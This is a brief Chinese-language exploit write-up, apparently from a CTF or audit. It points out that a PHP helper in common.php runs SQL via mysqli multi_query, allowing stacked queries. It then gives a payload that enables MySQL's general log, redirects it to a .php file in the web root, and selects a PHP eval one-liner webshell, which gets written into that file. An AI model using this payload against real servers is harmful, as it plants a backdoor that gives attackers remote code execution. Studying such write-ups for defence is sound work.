在common.php中发现执行sql语句用的多语句执行,所以可以利用多语句执行来getshell. 代码:
function my_mysql_query(
$sql){
global $conn;
if(
$conn->multi_query(
$sql)){
if (
$result = $conn ->store_result()) {
$row = $result->fetch_assoc();
$result->close();
$conn->close();
return $row;
}
}
}
payload:
set global general_log='ON';set global general_log_file='/var/www/html/web00/phpinfo.php';select '<?php @eval($_POST[1]);?>';#
查询操作会写入日志文件,即一句话木马会写进日志文件。